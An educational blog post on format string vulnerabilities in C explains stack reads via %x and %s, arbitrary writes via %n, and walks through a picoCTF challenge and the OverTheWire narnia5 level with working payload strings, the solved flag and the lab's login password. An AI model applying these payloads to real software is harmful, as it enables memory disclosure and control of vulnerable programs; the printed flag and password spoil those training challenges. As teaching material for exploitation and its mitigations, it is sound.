Format String Exploitation

Introduction

Welcome back to another blog post delving into exploiting memory vulnerabilities. In the previous article, we cover simple security bypass techniques for buffer overflow protections like the ROP. In this article, we look at format string vulnerabilities, how they arise, how we can exploit them and finally discuss the mitigations for protecting against them.

While these vulnerabilities have been spotted as early as the 90s and 2000s, it is not uncommon that memory corruption bugs still arise in the modern-day and age, but with greater complexity in exploiting them. Understanding how memory corruption techniques work on a basic level is fundamental towards learning to exploit development and discovering more complex software flaws.

Prerequisites

To gain the most out this blog post, it is important to have some understanding of the following:

  • Basic C/C++ understanding
  • Linux fundamentals

Objectives

By the end of this blog-post, readers should be able to:

  • Identify format string bugs
  • Exploit format string bugs
  • Protect against these vulnerabilities

Format strings and how they work

Format strings are used during input and output. It tells the compiler what type of data is in a variable when taking input e.g scanf(), and printing output e.g printf().

Formatting takes place via placeholders within the format string. e.g., if one wanted to print out a person’s age, they could present the output using the string “your age is” and a signed decimal specifier character d to denote using an integer.

Here we have a list of format specifiers and their uses in C.

Format SpecifierType
%cCharacter
%dSigned integer
%e or %EScientific notation of floats
%fFloat values
%g or %GSimilar as %e or %E
%hiSigned integer (short)
%huUnsigned Integer (short)
%iUnsigned integer
%l or %ld or %liLong
%lfDouble
%LfLong double
%luUnsigned int or unsigned long
%lli or %lldLong long
%lluUnsigned long long
%oOctal representation
%pPointer
%sString
%uUnsigned int
%x or %XHexadecimal representation
%nPrints nothing
%%Prints % character

We can also combine format strings with escape sequences to further improve output:

  • \n :newline
  • \t :tab
  • \b :backspace
  • \r :carriage return

printf()

printf() is one of the most common format strings. It stands for “print formatted” and it is complementary to scanf(). Many languages other than C copy the printf() format string syntax in their own I/O functions.

In C programming language, printf() function is used to print the characters, strings, floats, integers.

scanf()

This function is used to read formatted input from the user. We use format specifiers here just as we do in printf(). e.g, %d is used to take int input from the user.

When the user enters an integer it is stored in the testInteger variable.

Using both scanf and printf requires you to include the stdio.h header file.

Format String Exploitation

Now here comes the good part! Format string bugs come about when the submitted data were taken in as an input string is evaluated as a command by the application. In this way, the attacker could execute arbitrary code, read the stack contents, or crash the program by causing a segmentation fault.

To better understand the format string bug, let us take a look at some examples

Here is a correct and safe way to use format strings:

Compile the code above and run it

Here is an incorrect and vulnerable way to write format strings

Well, the programs work as expected, but what happens if we supply a format string as an argument to the program instead of a string?

For the first example:

The input gets sanitized correctly and is displayed well

For the second example:

We end up with some weird output because the %x argument is being passed directly to the printf() function. Since it does not find the value intended to be displayed, it pops values off the stack and shows them to us.

Stack anatomy during calling printf()

This blog post talked about how the stack behaves during function calling and storing temporary data like variables.

Here we will look at how the stack behaves when a printf() function is called. When called, printf() prepares an output buffer. It then loops through the format string, character by character, adding one to the buffer pointer and the format string pointer.

If the next character is a %, we have a format specifier. Depending on the characters after %stdarg.h will be used to read the next value of the stack. How this value is interpreted(int, char, pointer, long etc.) depends on the processing of % and the characters following it.

After all that is finished, it sends the resulting buffer to the terminal for output (stdout).

points to note

  • The function printf() fetches the arguments from the stack. If the format string needs three arguments, it will fetch 3 data items from the stack. Unless the stack is marked with a boundary, printf() does not know that it runs out of the arguments provided.
  • Since there is no such marking. printf() will continue fetching data from the stack.
  • In a mismatch case, it will fetch some data that do not belong to this function call.

Example of a printf() stack frame

Suppose we have a printf() function such as the one below that takes in 3 parameters

printf ("a has value %d, b has value %d, c is at address: %08x\n",
a, b);

The variables and the return pointer get loaded into the stack as follows

Note that the stack grows downwards towards lower addresses and that the arguments are pushed in reverse into the stack, representing a LIFO structure.

The program above is run with only two arguments instead of 3; what happens to the compiler?

  • Since printf() is a function defined with variable length of arguments, everything will look fine to the function
  • To find any mistakes, the compiler needs to understand how printf works, and unfortunately, they do not.
  • Sometimes the format string is generated at compile-time, and the compiler cannot detect any mismatches.

Crashing the program

If we supply “%s%s%s%s%s%s%s%s%s%s%s%s” as our arguments, printf() will fetch a number from the stack, treat this number as an address and print out the memory contents pointed by this address as a string until a NULL character is encountered.

Since the number fetched by printf() might not be an address, the memory pointed by this number might not exist (i.e. no physical memory has been assigned to such an address), and the program will crash.

Viewing the stack contents

We can try accessing elements at given positions in the stack using format specifiers like %x, %s or even format string direct access, e.g 4th element on the stack can be accessed using the dollar sign qualifier as follows

%<int>$x – where int is the element’s position in the stack that you want to access.

./incorrect-frmt 'AAAA.%4$x'

Above, I tried accessing up to the 8th element, and not surprisingly, we run into ‘41414141’, the hex value for AAAA, which was the first argument to the program. This means we loaded AAAA somewhere into the stack together with %8$x, and when printf encountered %8$x it prints out the 5th element in the stack, which is our input.


Let us try viewing the stack with %08x , which retrieves parameters from the stack and displays them as 8-digit padded hexadecimal numbers.

Again, we can see our AAAA at the 8th position of the stack.

Difference between %x and %s

In C programs, variables are stored on the stack, so when printf() encounters %x , it simply pops off the first variable on the stack after the format specifier.

When %s is encountered in a program, printf() will fetch a number from the stack and treat it as an address. It will then print out the memory contents pointed by this address as a string until it encounters a NULL character.

Viewing memory at any location

Let’s take things a notch higher. To view data at any memory location in the program, we have to supply an address of the memory location.

The function maintains a stack pointer that knows the location of the parameters in the stack. An important thing to note is that the format string is usually located on the stack.

If we can encode the target address we want to read from into the format string, the target address will be placed into the stack. We can control the address if we force printf() to obtain it from the format string.

Example of reading a target address from memory

Take an example of this vulnerable code

The code creates a variable of 100 bytes (user_input), takes in input from the user, stores the variable, and prints it. The vulnerability is on line 5. No format string has been specified for printf().

Suppose we want to print the contents of address 0x10014808 using the format string vulnerability. We can supply the following as our argument in the format string.

"\x10\x01\x48\x08 %x %x %x %x %s" – we represent addresses in 1 byte chunk using \x

  • \x10\x01\x48\x08 are the 4 bytes of the target address (0x10014808).
  • %x causes to the stack pointer to move towards the format string.

We use 4 %x to move the printf()’s pointer towards the address stored in the format string. Once we reach our destination, we give %s to printf(), causing it to print out the contents of the memory address at 0x10014808

The space between user_input() and the address passed to the printf() function is not for printf(). This distance decides how many %x you need to insert into the format string before giving %s. In our example, we needed 4 of them.

Example of writing to any location in memory

The %n format specifier will write the size of our input at the address pointed by %n. %n will calculate the number of bytes printf() has output so far and write it to the appropriate variable

Take a look at the examples below

The above will write 0 to the variable a, because nothing is being output.

This example will write 4 to variable a, since “AAAA” is of length 4.

Instead of using a simple %n, we can use %<num>$n to specify the address to write to.

Enough of the theory, let’s get our hands dirty.

Practical Example 1: Reading from the stack

In our first example, we are going to solve a simple CTF challenge by picoCTF. This will require us to leak an API key from the server via a format string bug.

We have a vuln.c file , the source code to the challenge. Let us interact with the challenge remotely, then analyze the source code locally.

The program has two options. The first one asks for an API token. The second doesn’t have anything interesting.

We review the source code

Compiling the source code and running it locally to try and get the logic of the application

Flag file not found. Contact an admin. Tracing this line back to the source code, we get this

The buy_stonks function is the function that gets called when the first option is selected. FILE *f = fopen(“api”,”r”); opens a file named api which contains the flag. Let us create a dummy api file on our local machine and run the binary again.

If you look closely, that printf function in the buy_stonks functions contains the format string vulnerability.


We exploit the format string bug by supplying a number of %x as our input. This %x will get stored on the stack, and when printf encounters them, it will leak the data on the stack. This way, we could reveal the contents of the API file.

We leak some data off the stack, but since %x returns data in hex, we can convert this back to ASCII using cyberchef

Our output may look like gibberish, but if you observe closely, you can see some printable text that looks unreadable but is in reverse. This is due to the architecture of the machine we grabbed the data from. A concept known as endianness reverses the bit order of the text. Our target flag is ocip{FTC0l_I4_t5m_ll0m_y_y3nc42a6a41ÿÞ.} We need to reverse the endianness of the string and discard off the appended unreadable bytes.

Our flag is picoCTF{I_l05t_4ll_my_m0n3y_a24c14a6}

Practical Example 2: Writing to the stack

For this example, we will be exploiting narnia5 from the Narnia series by overthewire

credentials:

  • username: narnia5
  • password: faimahchiy
  • hostname: narnia.labs.overthewire.org
  • port: 2226

Our challenge is in the /narnia directory.

We get presented with both the source code and compiled binary file. Our goal for the challenge is to change the value of the i variable from 1 to 500 using a format string vulnerability.

If i is set to 500, we get a message “GOOD” and a shell. The snprintf function is used to write a formatted string character to a character string buffer. Simply put, it will accept an argument from the command line and store it in a buffer. There is an apparent format string vulnerability on lines 12 and 19.

The program prints some information concerning the variables in the program.

In this case, when we supply 2 %x, we see that the first value printf() pops off the stack is actually AAAA, the contents we put into our buffer. Since the first value of %x is the contents of our buffer, all we need to do now, is use %n and a memory address location to overwrite the first value on the stack.

Since our first value is directly at the top of the stack, let us replace the As with a memory address location, such as the one provided by i.

./narnia5 $(echo -e "\xe0\xd6\xff\xff")%n

Interesting, the value of i changes to 4. If you recall, we mentioned that %n writes the size of our input to a memory address specified by %n or to a specific variable.


So in this case, %n writes 4 to i because we supply input of 4 bytes and write to that memory location. It only makes sense to provide an additional 496 bytes to our program to overwrite i with 500.

We can use %x to create padding of bytes to supply to the program as follows %x%1\$n

./narnia5 $(echo -e "\xd0\xd6\xff\xff")%496x%1\$n

Mitigations against format string vulnerabilities

1. Secure coding

The best way to prevent against format string bugs is writing secure code since the root cause of format string bugs is insecure coding. Developers of languages that are susceptible to format string vulnerabilities should be aware of risky functions and their secure usage

2. FormatGuard

FormatGuard is a mechanism that defends against format bug attacks by comparing the number of actual arguments presented to printf against the number of arguments called by the format string. If the actual number of arguments is less than the number of arguments the format string calls for, then FormatGuard deems this call to be an attack.

Conclusion

What we have gone through in this article creates an excellent foundation to understanding basic binary exploitation and possibly get you into low-level software security. I had lots of fun writing this article as I had no experience with format string bugs, and I hope you enjoyed it too!

References

0 Shares:
You May Also Like